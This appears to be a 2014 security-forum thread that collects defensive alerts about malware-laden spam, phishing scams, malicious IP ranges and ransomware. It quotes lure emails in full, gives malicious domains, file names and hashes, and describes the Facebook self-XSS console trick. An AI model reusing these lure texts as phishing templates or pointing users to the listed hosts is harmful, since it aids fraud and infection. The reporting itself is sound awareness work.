... As advertised by the malware authors in the ransom demand, the files were encrypted with an RSA-2048 key generated on the victim’s computer. This was done using Microsoft’s own cryptographic infrastructure and Windows APIs to perform the key generation before sending it back in plain text to the attacker’s server. However, using this method means that the decryption key the attackers are holding for ransom, actually still remains on the infected computer after transmission to the attackers server... To further protect against threats of this nature, it is recommended that you follow security best practices and -always- backup your files..."

:mad: :mad:

AplusWebMaster
2014-04-08, 15:25
FYI...

Fake Evernote – Image has been sent – leads to malware download
- http://myonlinesecurity.co.uk/image-sent-fake-evernote-leads-malware-download/
8 April 2014 - "... appears to come from Evernote service [support@ evernote .com}] another one from the current bot runs which try to drop loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment
Image has been sent < your name>.
DCIM_4199.jpg <http ://kingperu .com/1.html >
28 Kbytes
Go to Evernote <http ://kingperu .com/1.html>
2014 Evernote. Privacy policy provides our policies and procedures for collecting, using, and disclosing your information.
Users can access the Evernote service (the “Service”) through our website, applications on Devices, through APIs, and through third-parties.
A “Device” is any computer used to access the Evernote Service, including without limitation a desktop, laptop, mobile phone, tablet, or other consumer electronic device...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/04/evernote-image-has-been-sent.png

Following the link in the email sends you to a page offering a download of Vio player (why on earth anybody would think that they need vio player to view an image in evernote, I really don’t know). You -don’t- get the download offering from the original page but that loads 3 sites in the background and you are randomly sent to one...
8 April 2014 : setup.exe (565kb) : Current Virus total detections: 5/51*"
* https://www.virustotal.com/en/file/5e4f6b8ad552b9863fa0af5ab0fd844b9cdc84a04890e0450e979d9be1bd21b4/analysis/
___

Fake Sage SPAM ...
- http://blog.dynamoo.com/2014/04/sage-please-see-attached-copy-of.html
8 April 2014 - "This -fake- Sage spam comes with a malicious attachment:
Date: Tue, 8 Apr 2014 08:65:82 GMT
From: Sage [Merrill.Sterling@ sage-mail .com]
Subject: RE: BACs #3421309
Please see attached copy of the original invoice.

Attached is a file BACs-3421309.zip which in turn contains a malicious executable BACs-040814.exe which has a VirusTotal detection rate of 10/51*. The Malwr analysis** shows that it attempts to download a configuration file from [donotclick]hemblecreations .com/images/n0804UKd.dim and then it attempts to connect to a number of other domains and IP addresses.
Recommended blocklist:
50.116.4.71
aulbbiwslxpvvphxnjij .biz ..."
(More URLs listed at the dynamoo URL above.)
* https://www.virustotal.com/en-gb/file/85f66c8cf954fe7d3093e698e3a2ce5964d16e163f2ca429329fdea2bfa2c2c8/analysis/1396961704/

** https://malwr.com/analysis/MDBjYmFhY2Q3ZDNjNDg0N2I3MGFmYTY0MjJlMWRhYTI/

- https://www.virustotal.com/en/ip-address/50.116.4.71/information/
___

Fake Starbucks 'gift' email – fake PDF malware
- http://myonlinesecurity.co.uk/starbucks-coffee-company-gift-form-friend-fake-pdf-malware/
8 April 2014 - "... another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This one is slightly more unusual than most others because they are sending a .exe file in the email and not a zipped file...
Your friend just made an order at Starbucks Coffee Company a few hours ago.
He pointed he is planning to make a special gift for you and he have a special occasion for that.
We’ve arranged an awesome menu for that case that can really surprise you with our new flavors.
In the attachment you can view the whole menu and the address and the exact time you can come and celebrate this day with your friend.
He asked to stay anonymous in order to make some mystery and desire to come and enjoy this atmosphere.
Have an awesome evening!

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/04/starbucks-gift.png

8 April 2014 Starbucks Coffee Company gift details on 12.04.2014.exe - Current Virus total detections: 4/50*. This Starbucks Coffee Company gift form your friend is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/cd8701f7ecd98aff82deb2e447a9fbc8bc67265fe6df6e4732bcaf4dde672541/analysis/
___

Bank of America CashPro Spam
- http://threattrack.tumblr.com/post/82109999294/bank-of-america-cashpro-spam
Apr 8, 2014 - "Subjects Seen:
FW: Important documents
Typical e-mail details:
Important account documents
Reference: C58
Case number: 8924169
Please scan attached document and fax it to +1 (888) 589-0271.
Please note that the Terms and Conditions available below are the Bank’s most recently issued versions...

Malicious File Name and MD5:
AccountDocuments.zip (2A3034F7E6AD24B58CA11ED13AB2F84D)
Account_Documents.scr (3CD24390EDAE91C0913A20CEF18B5972)

Screenshots: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/9213aae37d3813e5c8ddeabf01130b0a/tumblr_inline_n3q546rTSR1r6pupn.png

Tagged: Bank of America, CashPro, Upatre
___

Scam Virus Shield app top paid app in Play Store
- http://blog.malwarebytes.org/mobile-2/2014/04/scam-virus-shield-app-top-paid-app-in-play-store/
Apr 8, 2014 - "An app claiming to be an antivirus solution climbed the charts as a top paid app in the Play Store...The problem is the app is a -fake-, a scam really. It does not scan for nor does it detect malware on Android devices...
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/04/virussheild03.jpg
The app doesn’t do much but change the protection status and run a progress bar in the notification area. Although it appears to do a scan, it does not and has very limited functionality. The app is no longer in the Play Store and was first reported by Android Police*..."
* http://www.androidpolice.com/2014/04/06/the-1-new-paid-app-in-the-play-store-costs-4-has-over-10000-downloads-a-4-7-star-rating-and-its-a-total-scam/

- http://cdn.androidpolice.com/wp-content/uploads/2014/04/nexusae0_2014-04-07-02.08.02.png

:fear: :mad:

AplusWebMaster
2014-04-09, 16:00
FYI...

Instagram Scam: Lottery Winners impersonated to offer Money for Followers
- http://www.symantec.com/connect/blogs/instagram-scam-lottery-winners-impersonated-offer-money-followers
9 Apr 2014 - "... Instagram scammers have been posting images offering -fake- lottery winnings to followers. They have convinced users to share the posts, give up personal information, and even send money back to the scammers...
> http://www.symantec.com/connect/sites/default/files/users/user-2998361/figure1_20.png
... In this -scam- a number of Instagram accounts have been created to impersonate real-life lottery winners from the UK and US. These accounts claim to offer US$1,000 to each Instagram user who follows them and leaves a comment with their email address... It’s clear that these accounts are fraudulent, but users continue to believe that they will be given US$1000 just for following Instagram accounts... if it sounds too good to be true, it is."
___

Something evil on 66.96.223.192/27
- http://blog.dynamoo.com/2014/04/something-evil-on-669622319227.html
9 Apr 2014 - "There seems to be some exploit activity today on the IP range 66.96.223.192/27 (a customer of Network Operations Center, US). Most domains are already -flagged- as malicious by Google, and I've reported on bad IPs in this range before. A list of the domains I can find in this range, their myWOT ratings and Google and SURBL prognoses can be found here* [csv]. I would recommend applying the following blocklist:
66.96.223.192/27
capcomcom .com
chebuesx .com ..."
(Long list at the dynamoo URL above.)
* http://www.dynamoo.com/files/66.96.223.192-27.csv
___

Fake eBay emails – Pharma SPAM
- http://myonlinesecurity.co.uk/fake-delayed-mails-ebay-pharma-spam/
9 Apr 2014 - "... we are now seeing fake < Your name >, You have delayed mails from eBay. In exactly the same way as The Fake Facebook Messages, these fake Ebay messages appear to come from eBayNotifier but are being sent by one of the botnets and -not- by Ebay at all. These only have 1 link in them unlike the previous which normally have 2 links in them, that if you are unwise enough to click on them will either take you to a Women’s Health page trying to sell you fake drugs for slimming or other women’s problems. Other days they send you to one of the Canadian or Russian Pharmacy pages selling Viagra, valium or other illegal drugs. Todays offerings are to a Canadian Pharma spam site. Always hover over the links in these emails and you will see that they do -not- lead to Ebay. Do not click on the links, just -delete- the emails as soon as they arrive. There is always the very high possibility that one of the other botnets will use these to send you to a malicious site where your computer will be infected... Email text will say something like:
Your name,
You have delayed mail
View mails
Yours truly
eBayNotifier

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/04/You-have-delayed-mails-from-eBay.png ..."

:mad: :fear:

AplusWebMaster
2014-04-10, 15:59
FYI...

Fake CDS Invoice – fake PDF malware
- http://myonlinesecurity.co.uk/cds-invoice-fake-pdf-malware/
10 April 2014 - "Following on from today’s and other recent DHL* and -other- delivery service failure notices, the malware gangs have changed track and are sending out local courier company invoices. CDS Invoice pretending to come from accounts@ cdsgroup .co .uk is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses...
Dear client
Please find attached your invoice number 168027
If you have any queries with this invoice, please email us... or call us...
For and on behalf ofThe CDS Group of Companies
Crawfords of London | CrawfordsDelivery Services | Media Express |CDS International
Passenger Car Services Same Day UK Couriers TV Support Units Overnight & International...
This message and any attachment are confidential and may be privileged...
This email has been scanned...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/04/cds-invoice.png

9 April 2014: CDS_INVOICE_168027.zip (464 kb): Extracts to CDS_INVOICE_168027.exe
Current Virus total detections: 6/51**. This CDS Invoice is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* http://myonlinesecurity.co.uk/dhl-delivery-failure-fake-pdf-malware/
10 April 2014

Fake DHL email Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/02/DHL-delivery-report.png

** https://www.virustotal.com/en/file/13858453fadb0db87362264218d5f99f360814322b43b699f0c725de9def260c/analysis/1397115564/
___

SCAM: Climate Change And Health Conference ...
- http://blog.dynamoo.com/2014/04/ccahc-climate-change-and-health.html
10 April 2014 - "This -spam- is a form of an advanced fee fraud scam:
From: CCAHC ccahc@ live .com
Reply-To: ccahc@ e-mile .co .uk
Date: 10 April 2014 16:04
Subject: Call for Poster
CCAHC: Climate Change And Health Conference 2014
Dear Colleague,
On behalf of the CCAHC Scientific Committee, you are cordially invited to attend the 14th Climate Change & Health Conference to be held in Ibis Garden Hotel, from 16th - 18th May, 2014.
The CCAHC 2014 event promises unrivalled learning and networking opportunities for the general public. Invited speakers are experts from multiple sectors and disciplines. Case studies of successful collaborations of environment, nutrition and public health across a wide range of issues...
Sincerely yours,
Professor Jon Lloyd
Conference Chair
Maple House, 37-45 City Road, London EC1Y 1AT, United Kingdom

The email originates from 196.46.246.174 (Airtel, Nigeria) via 221.120.96.3 in Bangladesh. Note that the sender is using -free- email addresses rather than one that ties back to an identifiable organisation. The email was sent to a spamtrap... the sting is that there will be visa and hotel fees to pay before going to the conference, and once this money has been sent by Western Union then the scammers will -vanish- taking their mythical conference with them."
___

Fake UPS SPAM - Exception Notification – fake PDF malware
- http://myonlinesecurity.co.uk/ups-exception-notification-fake-pdf-malware/
10 April 2014 - "... UPS Exception Notification pretending to be from UPS Quantum View [auto-notify@ ups .com] is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses, with the hope of getting a better response than they do from consumers. This one has links in the email to download the malware laden zip, rather than an attachment...
UPS
Discover more about UPS:
Visit ups .com
At the request of the shipper, please be advised that delivery of the following shipment has been rescheduled.
Important Delivery Information
Tracking Number:1Z522A9A6892487822 [ clickable URL ]
Rescheduled Delivery Date:14-April-2014
Exception Reason:THE CUSTOMER WAS NOT AVAILABLE ON THE 1ST ATTEMPT. A 2ND ATTEMPT WILL BE MADE
Exception Resolution:PACKAGE WILL BE DELIVERED NEXT BUSINESS DAY.
Shipment Detail ...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/04/UPS-Exception-Notification.png

... another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is..."

:mad: :fear:

AplusWebMaster
2014-04-11, 14:13
FYI...

Something evil on 62.75.140.236, 62.75.140.237, 62.75.140.238 and 64.120.207.253, 64.120.207.254
- http://blog.dynamoo.com/2014/04/something-evil-on-6275140236-6275140237.html
11 April 2014 - "This set of IPs is being used to push the Angler EK [1*] [2**]:
Intergenia, Germany
62.75.140.236
62.75.140.237
62.75.140.238
Network Operations Center (HostNOC), US
64.120.207.253
64.120.207.254
A look at the /24s that these ranges are in indicates a mix of malicious and legitimate sites, but on the whole it might be a good idea to consider blocking traffic to 62.75.140.0/24 and 64.120.207.0/24.
Sites on these IPs consist of hijacked subdomains of (mostly) legitimate domains in the Intergenia range and purely malicious domains in the HostNOC range..."
(Long list of domains at the dynamoo URL above.)
* http://wepawet.iseclab.org/view.php?hash=7d33b6700333f1babb56e2f92b006524&t=1397206144&type=js

** http://urlquery.net/report.php?id=1397206442682
___

Fake UKMail - Proof of Delivery Report – fake PDF malware
- http://myonlinesecurity.co.uk/proof-delivery-report-ukmail-fake-pdf-malware/
11 April 2014 - "Continuing from yesterday’s theme of parcel & courier email messages, the malware bad guys are continuing with the same theme today. Proof of Delivery Report: 09/04/14-11/04/14, pretending to come from UKMail Customer Services [list_reportservices@ ukmail .com] is another one from the current bot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses, with the hope of getting a better response than they do from consumers...
Dear Customer,
Please find attached your requested Proof of Delivery (POD) Download Report
………………………………………………………………………………………………………………………
iMail Logo
“For creating, printing and posting your next day mail”
click here to realise the savings that you could make
Please consider the environment before printing this e-mail or any attachments.
This email and its attachments may be confidential and are intended solely for the use of the individual to whom it is addressed.
If you have received this message in error, please notify us and remove it from your system. Any views or opinions expressed are solely those of the author and do not necessarily represent those of UK Mail Group Plc or any of its subsidiaries.
UK Mail Group Plc is registered and incorporated in England.
Registered Office: Express House, 120 Buckingham Avenue, Slough, SL1 4LZ, United Kingdom.
Registered Company No.: 02800218.

11 April 2014: poddel-pdf-2014041103004500.zip (59 kb). Extracts to poddel-pdf-2014041103004500.exe
Current Virus total detections: 2/51*. This Proof of Delivery Report: 09/04/14-11/04/14 is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/fc3cfa2fffe6b93339402c371d90a51bc7fc03e4ecabbe3e5ab09e68e29a8f0d/analysis/

:mad: :fear:

AplusWebMaster
2014-04-16, 23:27
FYI...

Something still evil on 66.96.223.192/27
- http://blog.dynamoo.com/2014/04/something-still-evil-on-669622319227.html
16 April 2014 - "Last week I wrote about a rogue netblock hosted by Network Operation Center* in the US. Well, it's still spreading malware but now there are -more- domains active on this range. A full list of the subdomains I can find are listed here [pastebin**]. I would recommend that you apply the following blocklist:
66.96.223.192/27
andracia .net ..."
(Long list at the dynamoo URL above.)
* http://blog.dynamoo.com/2014/04/something-evil-on-669622319227.html

** http://pastebin.com/RQfE69hn
___

Netflix-themed tech support SCAM ...
- http://blog.malwarebytes.org/fraud-scam/2014/04/netflix-themed-tech-support-scam-comes-back-with-more-copycats/
April 16, 2014 - "A few weeks ago we blogged about this Netflix phishing scam -combined- with fake tech support that was extorting private information and money from people. The scam worked by asking unsuspecting users to log into their Netflix account and enter their username and password into a -fraudulent- website. After collecting the personal details, the perpetrators used a fake warning to state the particular account had been suspended. All this effort was really about leading potential victims into a trap, by making them call a 1-800 number operated by -fake- tech support agents ready to social engineer their mark and collect their credit card details. A slightly new variant is once again making the rounds with the same goal of funnelling traffic to -bogus- ‘customer support’ hotlines:
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/04/blurred_netflix.png
... this time around the scammers behind it are expanding the phishing pages to other online services as well to target a wider audience. Crooks are buying online ads for each brand such as this one on Bing for “netflix tech support number”:
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/04/bingad1.png
... The quality of leads you get from targeted advertising is much higher than that from random cold calls. If you can attract people already looking for help and offer them your service, chances are conversion rates will be higher..."

:fear: :mad:

AplusWebMaster
2014-04-18, 14:26
FYI...

Fake Facebook Chat Verification used for SPAM
- http://blog.trendmicro.com/trendlabs-security-intelligence/fake-facebook-chat-verification-used-for-spam/
Apr 17, 2014 - "Facebook users are once again the target of a malicious scheme—this time in the form of a notification about “Facebook Chat”. The spammed notification pretends to come from the “official Facebook Chat Team.” A notification shows users of a tagged comment to a Facebook Note containing a fake announcement about a Facebook Chat verification requirement.
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/04/FB-chat-spam1.jpg
The spam tries to sound urgent to convince users to verify their accounts. To do so, they are first asked to to go to a Pastebin URL and are instructed to copy a specific code. The set of instructions differ depending on what browser is being used (Google Chrome, Mozilla Firefox, or Internet Explorer). Users are then directed to a shortened link and are asked to press a particular function key (F12 for Google Chrome users, for example). After clicking on the console tab, users are supposed to paste the provided Javascript code into the address bar, then press Enter. This actually gives bad guys access to the user’s account, giving them the capability to auto-tag anyone in the users’ friends list and start the cycle of victimizing other account users... From the get-go, users should know that there is -no- product called “Facebook Chat,” let alone a team that sends out a supposed “advisory” to its users. The social media site’s official instant messaging feature is called Facebook Messenger, which also the name of its stand-alone app. Earlier this month, Facebook announced* that Android and iOS users will be required use this stand-alone app by eliminating the chat features of the traditional app versions of the site. Facebook has taken action against threats like this by releasing an official announcement. The official Facebook warning** notes, “This is a variant on the self-XSS attack. By pasting the code in the browser console, the user gives the code access to their account. The code usually posts the same scam on other people’s walls, and subscribes the user to pages controlled by the attacker – but it could do much worse things”..."
* http://mashable.com/2014/04/09/facebook-requiring-messenger/

** https://www.facebook.com/selfxss
___

Zeus with your coffee ...
- https://www.securelist.com/en/blog/8207/Would_you_like_some_Zeus_with_your_coffee
Apr 16, 2014 - "Cybercriminals often like to use a bogus letter to trick people into opening malicious attachments. There are two tricks that make this work: a message from a familiar name (a bank, social network, service provider or other organization that might interest the recipient) and an intriguing or alarming subject. An attack based on -fake- messages supposedly from coffee chain Starbucks combined the two.
> https://www.securelist.com/en/images/vlweblog/blog_vergelis_starbucks.jpg
The detected distribution claimed... a recipient's friend made an order for him to celebrate a special occasion in a Starbucks coffee shop. That mysterious friend wished to remain anonymous, enjoying the intrigue he was creating, but was sending out invitations with details of a special menu, which is available in the attachment. In the end they wished the recipient an awesome evening. All the messages were sent out with high importance. Besides, the addresses, created on the Gmail and Yahoo! free mail services, changed from letter to letter and seemed to be randomly generated combinations like incubationg46@, mendaciousker0@ and so on. The attachment was a .exe file and the cybercriminals made no effort to mask it with an archive or double filename extension. They seemed to be sure a happy recipient would open the attachment without any suspicion. Kaspersky Lab detects the attached file as Rootkit.Win32.Zbot.sapu - a modification of one of the most notorious spyware family Zbot (ZeuS). These applications are used by cybercriminals to steal confidential information. This version of Zbot is able to install a rootkit Rootkit.Win32.Necurs or Rootkit.Win64.Necurs, which disrupts the functioning of antiviruses or other security solutions."
___

Google patches Android icon Hijacking vuln
- http://www.securityweek.com/google-patches-android-icon-hijacking-vulnerability
Apr 15, 2014 - "Researchers at FireEye have identified a vulnerability affecting Google Android that could be exploited to lead users to malicious sites. According to FireEye*, the issue allows a malicious app with 'normal' protection level permissions to target legitimate icons on the Android home screen and modify them to point to attack sites or the malicious app itself without notifying the user. The issue has been acknowledged by Google, which has released a patch to its OEM partners..."
* http://www.fireeye.com/blog/technical/2014/04/occupy_your_icons_silently_on_android.html
Apr 14, 2014

- https://atlas.arbor.net/briefs/index#-561580891
Elevated Severity
17 Apr 2014

:fear: :mad:

AplusWebMaster
2014-04-22, 12:53
FYI...

Fake Santander Bank SPAM – word doc malware
- http://myonlinesecurity.co.uk/santander-bank-march-invoice-fake-word-doc-malware/
Apr 22, 2014 - "March Invoice pretending to be from Santander bank with a sender address of Sarah Gandolfo [sgand0395@ aol.com] is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
Please find attached your March invoice, we now have the facility to email invoices, but if you are not happy with this and would like a hard copy please let me know.
New bank details for BACS payments are Santander Bank Sort Code 271201 Account No 56024641.
Thanks very much
Sarah

22April 2014: March invoice 5291.zip ( 10kb) Extracts to March invoice 8912.exe
Current Virus total detections: 1/51* . This March Invoice is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/4c69e3b6d2f7dbaf78eacfd60f2de685da9d942fdf9c1ff7ae4b88be17075fbe/analysis/
___

Visa Card phish ...
- http://www.hoax-slayer.com/visa-card-status-notification-phishing-scam.shtml
Apr 22, 2014 - "... email purporting to be from Visa claims that the recipient's card access has been limited because 'unusual activity' has been detected... The email is -not- from Visa. It is a -scam- designed to steal the recipient's credit card data. A link in the email opens a -fake- website that asks for the user's credit card number, and other information pertaining to the recipient's Visa account...
Example:
Subject: Access to your Visa card has been blocked
Visa Card Status Notification
We are contacting you to Inform you that our Visa Card security department identified some unusual activity in your card. In accordance with Visa Card User Agreement and to ensure that your Visa Card has not been accessed from fraudulent locations, access to your Visa Card has been limited. Your Visa Card access will remain limited until this issue has been resolved please Click My Visa Card Activity to continue.
My Visa Card Activity
We take your online safety seriously, which is why we use state of the art notification systems to identify unusual activity and a challenge process to validate your details.
Thanks for banking with Visa.
Customer Finance Department
© Visa & Co, 2014.

Screenshot: http://www.hoax-slayer.com/images/visa-card-status-notification-phishing-scam-1.jpg

The message invites users to -click- a link to resolve the issue and restore access... the message is -not- from Visa and the claim that the account has been limited is a lie... the email is a typical phishing scam designed to extract financial information from users. The email's links open a -bogus- website created to closely mirror the look and feel of a genuine Visa webpage. The fake page will include a 'verification form' that requests users to supply their credit card number and other account details. After supplying the requested information, users will be taken to a second fake page that informs them that the problem has been resolved and restrictions have been removed... of course, there was no problem with the card to begin with..."
___

Fake 'Paintball Booking' SPAM ...
- http://blog.mxlab.eu/2014/04/22/paintball-booking-confirmation-email-will-infect-your-computer-with-trojan/
Apr 22, 2014 - "... new trojan distribution campaign by email with the subject “Paintball Booking Confirmation”. This email is sent from the spoofed address “”ipguk52@ paintballbookingoffice .com” <ipguk@ paintballbookingoffice .com>” and has the following body:
Dear client,
Many thanks for your booking on Saturday 19/04/2014 at our Reading Paintball centre Mapledurham, Reading. Arrival time is 09:15AM prompt.
Please view the attached booking confirmation, map and important game day documents prior to attending.
Kind regards,
Leigh Anderson
Event Co-ordinator...

The attached ZIP file has the name Booking Confirmation 2826-66935.zip, once extracted a folder Booking Confirmation 0414-28921 is created which contains the 14 kB large file Booking Confirmation 0414-28921.exe. The trojan is known as Win32:Dropper-gen [Drp], W32/Trojan.ZLGD-2681, Trojan:W32/Zbot.BBLB or HEUR/Malware.QVM07.Gen. At the time of writing, 4/51 AV engines did detect the trojan at Virus Total. Use the Virus Total permalink* and Malwr permalink** for more detailed information.
SHA256: 4c69e3b6d2f7dbaf78eacfd60f2de685da9d942fdf9c1ff7ae4b88be17075fbe "
* https://www.virustotal.com/en/file/4c69e3b6d2f7dbaf78eacfd60f2de685da9d942fdf9c1ff7ae4b88be17075fbe/analysis/

** https://malwr.com/analysis/YmI4MmFlNDQ4ZmYzNDczNzlmZjNiYWU1ODMyMmMyZGQ/

:mad: :fear:

AplusWebMaster
2014-04-28, 23:12
FYI...

Massive cyber wire fraud attacks on US Companies
- https://www.trustedsec.com/april-2014/red-alert-massive-cyber-wire-fraud-attacks-us-companies/
April 25, 2014 - "... a number of US companies have been impacted, and unfortunately, a number of companies that are still unaware they were victim of this attack. A major offensive is currently happening on a number of United States based companies, mostly involving those that have international components. TrustedSec notified law enforcement that multiple companies are affected, and these attacks are aimed at extracting money from the companies. An ongoing and active case is in progress working with the companies affected and investigating the incidents... high success rate. They appear to have different escalation models and ways to force organizations to perform the transfer without triggering suspicion. They use a combination of social-engineering (both email and phone), compromising trusted partners/third parties, and spoofing email addresses in order to accomplish their goals...
What you can do:
1. Notify your financial and accounts payable departments of these attacks and the techniques.
2. Verify all transactions with your third party partners and vendors, especially when refunding money (phone calls directly to a known phone number).
3. Provide enhanced education and awareness of these types of attacks.
4. If you have fallen victim to this attack, notify your local FBI office immediately...
Measures should be taken right -now- in order to educate your finance and accounts payable departments as well as an emphasize in controls in place for your third party partners and vendors."
(More detail at the trustedsec URL above.)

:fear: :mad:

AplusWebMaster
2014-05-01, 23:26
FYI...

Something evil on 146.185.213.69 ...
- http://blog.dynamoo.com/2014/05/something-evil-on-14618521369-and.html
1 May 2014 - "146.185.213.69 caught my eye, hosting a number of "ads." subdomains, many of which are tagged by Google as being malicious... you can probably assume that all those domains are malicious (even without the ads. prefix)... The block is owned by RN Data SIA of Latvia and suballocated to somebody in St Petersburg by the name of Mikhail Evgenyevich Valyalov. RN Data are one of those hosts that have hosted malware in the past*, and I tend to lean towards blocking them... frankly this entire /24 looks like it is being used for evil purposes at the moment and I recommend that you block it..." [146.185.213.*]
* http://blog.dynamoo.com/2011/10/some-tdltdss-rootkit-sites-to-block.html
(More detail at the dynamoo URL above.)
___

Fake Malwarebytes 2.0 ...
- http://blog.malwarebytes.org/security-threat/2014/05/fake-malwarebytes-anti-malware-2-0-abound/
May 1, 2014 - "... we already started seeing fake executable files purporting to be free versions of our product being hosted on unfamiliar sites.
A small sample of rogue files we found in the wild:
> http://blog.malwarebytes.org/wp-content/uploads/2014/04/samples.png
One of the many sites that host MBAM PUPs:
> http://blog.malwarebytes.org/wp-content/uploads/2014/04/fake-site.png
... we found that these files have common behaviours: they all enable themselves to run whenever Windows is restarted or the system is turned on and they’re capable of accessing private information that browsers store whenever we go online, such as data pertaining to cookies, browsing history, and list of restricted sites... Several of these samples also create entries to IE’s restricted sites zone, consequently blocking users from accessing specific domains...
Sample of MBAM Installation GUI (taken from malwr.com):
> http://blog.malwarebytes.org/wp-content/uploads/2014/05/MWB-sample.png
For anyone interested in trying out MBAM 2.0, the wisest thing to do is still to go to our official download site*..."
* https://www.malwarebytes.org/downloads/

:mad: :fear:

AplusWebMaster
2014-05-05, 20:58
FYI...

Android "Police Locker" ransomware ...
- http://net-security.org/malware_news.php?id=2759
5.05.2014 - "Android users might soon become victims of "Police Locker" ransomware, if they haven't already, warns the researcher behind the Malware don't need Coffee blog*. "The 'Reveton team' has diversified its locking activity," he informs us. "The advert is old (2014-02-18) but i decided to write about it today as I found a Traffic Distribution System (TDS) using almost all features proposed by this affiliate including the Android locker." Other options for malware delivery include system lockers, fake AV, fake codecs, and Browlock ransomware. The researcher discovered a threat actor that uses a TDS that employs almost all features: if you land on a malicious site using Internet Explorer, a variant of the Winlock ransomware is served. If you land with with another browser on Windows, Linux or Mac, you'll get Brownlock. Finally, if you land on it with Android, you will be redirected to a fake adult website that will automatically push the download of a malicious APK file masquerading as a video downloader app (and using the icon of the legitimate BaDoink Video Downloader). The good news is that the user must approve the installation... The 'fine' US users are asked to pay in order to get their phones unlocked is $300, payable via Money Pak... The malware is detected... as Trojan Koler**, and the researcher has already spotted another threat actor delivering it. In this case, the malicious APK masquerades as the popular BSPlayer video player for Android."
* http://malware.dontneedcoffee.com/2014/05/police-locker-available-for-your.html

** https://www.virustotal.com/en/file/e1099a20bb6a253ffd4570b557ba60172ea448542a7aa7318cd5b1a160b8517d/analysis/1399286001/
Detection ratio: 4/52
___

Bank of America CashPro Spam
- http://threattrack.tumblr.com/post/84831159013/bank-of-america-cashpro-spam
May 5, 2014 - "Subjects Seen:
FW: Important account documents
Typical e-mail details:
Please scan attached document and fax it to +1 (888) 589-1001.
Please note that the Terms and Conditions available below are the Bank’s most recently issued versions. Please bear in mind that earlier versions of these Terms and Conditions may apply to your products, depending on when you signed up to the relevant product or when you were last advised of any changes to your Terms and Conditions. If you have any questions regarding which version of the Terms and Conditions apply to your products, please contact your Relationship Manager.
Yours faithfully
Vince Blue

Malicious File Name and MD5:
Account_Documents.zip (40E7BB684935A7B86E5D8E480974F691)
Account Documents.scr (6E40CD3BB6F1F531CDCE113A8C684B08)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/58d19a8d9d49219537830ad39178a449/tumblr_inline_n53y3hEgvd1r6pupn.png

Tagged: Bank of America, Upatre
___

Encrypting Ransomware ...
- http://www.webroot.com/blog/2014/05/05/evolution-encrypting-ransomware/
May 5, 2014 - "... big change in the encrypting ransomware family... For those that aren’t aware of what encrypting ransomware is, its a cryptovirus that encrypts all your data from local hard drives, network shared drives, removable hard drives and USB. The encryption is done using an RSA -2048 asymmetric public key which makes decryption without the key impossible. Paying the ransom will net you the key which in turn leads to getting your data back.
Cryptolocker:
> https://www.webroot.com/blog/wp-content/uploads/2014/05/cryptolocker5.png
(Other samples at the first webroot URL above.)
In it’s first evolution of what we know as “Cryptolocker” the encryption key was actually stored on the computer and the victim, with enough effort could retrieve said key. Then you could use tools submitted on forums to put in your key and decrypt all your data without paying the ransom. In future improvements malware authors made sure that the only place the key was stored was on a secure server so that you were forced to pay. However, more often than not the malicious dropper didn’t delete the VSS (Volume Shadow Service) and victims still had the option to manually restore files from a previous date using programs like Shadow explorer (OS drive only). For those that don’t know what the VSS is it’s a restorative feature that is included in XP sp2 and later versions of windows. Essentially it is a technology that allows taking manual or automatic backup copies of data and is related to system restore. In newer variants of Crytpolocker the VSS is almost always deleted at deployment. Malware authors also give the victim a special extended period of time to get their files they waited past the deadline, but the price usually doubles of triples.
CryptoDefense:
> https://www.webroot.com/blog/wp-content/uploads/2014/05/cryptolocker7.png
(Other samples at the first webroot URL above.)
In one of the more recent variants of encryption ransomware dubbed “CryptoDefense” it no longer has a graphical user interface (GUI). Instead the malware will just open a webpage after encryption and leave a text file at every directory that was encrypted. The instructions to get the key to decrypt your files have you install anonymous tor or other layered encryption browsers so you can pay them directly and securely. this enables malware authors to circumvent a portion of the Zeus fraud avoid the need for money mules (middle man) and increasing the percentage of profit.
DirCrypt:
> https://www.webroot.com/blog/wp-content/uploads/2014/05/dircrypt.png
